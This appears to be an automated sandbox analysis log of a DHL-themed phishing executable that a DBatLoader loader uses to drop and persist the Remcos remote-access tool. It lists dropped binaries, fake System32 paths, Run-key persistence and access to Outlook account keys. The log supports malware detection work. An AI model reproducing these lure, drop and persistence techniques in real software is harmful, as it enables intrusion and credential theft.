Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: winmm.dll Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: wldp.dll Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: propsys.dll Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: profapi.dll Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: edputil.dll Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: netutils.dll Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: slc.dll Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: userenv.dll Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: sppc.dll Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: mpr.dll Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: version.dll Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: archiveint.dll Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: url.dll Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: userenv.dll Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: netutils.dll Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: wldp.dll Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: propsys.dll Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: amsi.dll Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\xkn.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: DHL119040 receipt document,pdf.exe Static file information: File size 1390592 > 1048576
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: FodHelper.pdb source: extrac32.exe, 0000000E.00000002.1763595551.000001B076CE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000018.00000000.1833101121.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe, 00000018.00000002.1840596880.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe.14.dr
Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000007.00000002.1735401572.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000007.00000000.1734234471.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000002.1741873077.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000000.1735973999.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000000.1743797680.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000002.1750531723.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000000.1750914185.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000002.1758990941.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000002.1764352289.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000000.1759822129.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000000.1764756849.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000002.1832421872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000000.1794890355.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000002.1798993519.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000002.1849408594.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000000.1843787747.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000000.1850048548.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000002.1861809511.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000000.1862257217.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000002.1863811954.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000002.1865641377.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000000.1864540039.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000002.1867019902.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000000.1866079872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000002.1868535173.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000000.1867521283.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000000.1870059327.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000002.1871322746.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000002.1872553278.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000000.1871755612.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe,
Source: Binary string: powershell.pdbUGP source: xkn.exe, 00000010.00000000.1765237716.00007FF7F65BA000.00000002.00000001.01000000.0000000A.sdmp, xkn.exe.12.dr
Source: Binary string: easinvoker.pdbH source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: reg.pdb source: extrac32.exe, 0000000A.00000002.1749786988.000001CBEB360000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000013.00000000.1795528997.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe, 00000013.00000002.1796884193.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe.10.dr
Source: Binary string: powershell.pdb source: xkn.exe, 00000010.00000000.1765237716.00007FF7F65BA000.00000002.00000001.01000000.0000000A.sdmp, xkn.exe.12.dr
Source: Binary string: cmd.pdb source: alpha.exe, 00000007.00000002.1735401572.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000007.00000000.1734234471.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000002.1741873077.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000000.1735973999.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000000.1743797680.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000002.1750531723.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000000.1750914185.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000002.1758990941.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000002.1764352289.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000000.1759822129.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000000.1764756849.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000002.1832421872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000000.1794890355.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000002.1798993519.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000002.1849408594.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000000.1843787747.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000000.1850048548.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000002.1861809511.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000000.1862257217.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000002.1863811954.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000002.1865641377.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000000.1864540039.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000002.1867019902.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000000.1866079872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000002.1868535173.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000000.1867521283.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000000.1870059327.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000002.1871322746.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000002.1872553278.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000000.1871755612.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 000
Source: Binary string: FodHelper.pdbGCTL source: extrac32.exe, 0000000E.00000002.1763595551.000001B076CE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000018.00000000.1833101121.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe, 00000018.00000002.1840596880.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe.14.dr
Source: Binary string: reg.pdbGCTL source: extrac32.exe, 0000000A.00000002.1749786988.000001CBEB360000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000013.00000000.1795528997.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe, 00000013.00000002.1796884193.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe.10.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\Public\Libraries\yfkwifxL.pif Unpacked PE file: 1.2.yfkwifxL.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs . :EW;. :EW;. :R;. :W;. :W;. :W;
Yara detected DBatLoader
Source: Yara match File source: 0.2.DHL119040 receipt document,pdf.exe.28a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DHL119040 receipt document,pdf.exe.28a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1735332955.00000000028A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Binary contains a suspicious time stamp
Source: yfkwifxL.pif.0.dr Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B7CC8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, 0_2_028B7CC8
PE file contains sections with non-standard names
Source: alpha.exe.6.dr Static PE information: section name: .didat
Source: per.exe.14.dr Static PE information: section name: .imrsiv
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028BD2E4 push ecx; mov dword ptr [esp], edx 0_2_028BD2E9
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028CA2FC push 028CA367h; ret 0_2_028CA35F
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028A32FC push eax; ret 0_2_028A3338
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028A635A push 028A63B7h; ret 0_2_028A63AF
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028A635C push 028A63B7h; ret 0_2_028A63AF
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028CA0AC push 028CA125h; ret 0_2_028CA11D
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B3003 push 028B3051h; ret 0_2_028B3049
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B3004 push 028B3051h; ret 0_2_028B3049
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028CB1A4 pushad ; retf 0_2_028CB1A5
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028CA1F8 push 028CA288h; ret 0_2_028CA280
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028CA144 push 028CA1ECh; ret 0_2_028CA1E4
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028A674E push 028A6792h; ret 0_2_028A678A
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028A6750 push 028A6792h; ret 0_2_028A678A
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028AC504 push ecx; mov dword ptr [esp], edx 0_2_028AC509
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028AD538 push 028AD564h; ret 0_2_028AD55C
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028ACB84 push 028ACD0Ah; ret 0_2_028ACD02
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B78A4 push 028B7921h; ret 0_2_028B7919
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028AC8B2 push 028ACD0Ah; ret 0_2_028ACD02
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B68DE push 028B698Bh; ret 0_2_028B6983
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B68E0 push 028B698Bh; ret 0_2_028B6983
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028C9874 push 028C9A60h; ret 0_2_028C9A58
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028CDE98 push eax; ret 0_2_028CDF68
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B9EBB push 028B9EF4h; ret 0_2_028B9EEC
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B9EBC push 028B9EF4h; ret 0_2_028B9EEC
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B2EF8 push 028B2F6Eh; ret 0_2_028B2F66
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B5E14 push ecx; mov dword ptr [esp], edx 0_2_028B5E16
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B7F18 push 028B7F50h; ret 0_2_028B7F48
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B7C7C push 028B7CBEh; ret 0_2_028B7CB6
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA74E56 push ecx; ret 0_2_2DA74E69
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA97A28 push eax; ret 0_2_2DA97A46
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA9B132 push esp; ret 0_2_2DA9B141

Persistence and Installation Behavior
barindex
Drops PE files with a suspicious file extension
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe File created: C:\Users\Public\Libraries\yfkwifxL.pif Jump to dropped file
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\cmd.exe Executable created and started: C:\Windows \System32\per.exe Jump to behavior
Contains functionality to download and launch executables
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA46EB0 ShellExecuteW,URLDownloadToFileW, 0_2_2DA46EB0
Drops PE files
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe File created: C:\Users\Public\Libraries\yfkwifxL.pif Jump to dropped file
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe Jump to dropped file
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe File created: C:\ProgramData\Remcos\remcos.exe Jump to dropped file
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\xkn.exe Jump to dropped file
Source: C:\Windows\System32\extrac32.exe File created: C:\Windows \System32\per.exe Jump to dropped file
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\ger.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe File created: C:\ProgramData\Remcos\remcos.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe Jump to dropped file
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\xkn.exe Jump to dropped file
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\ger.exe Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\System32\extrac32.exe File created: C:\Windows \System32\per.exe Jump to dropped file

Boot Survival
barindex
Creates autostart registry keys with suspicious names
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-0X3XK5 Jump to behavior
Creates multiple autostart registry keys
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Lxfiwkfy Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-0X3XK5 Jump to behavior
Drops PE files to the user root directory
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe Jump to dropped file
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\xkn.exe Jump to dropped file
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\ger.exe Jump to dropped file
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA5AB0D OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 0_2_2DA5AB0D
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Lxfiwkfy Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Lxfiwkfy Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-0X3XK5 Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-0X3XK5 Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Rmc-0X3XK5 Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Rmc-0X3XK5 Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B9EF8 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_028B9EF8
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\ProgramData\Remcos\remcos.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
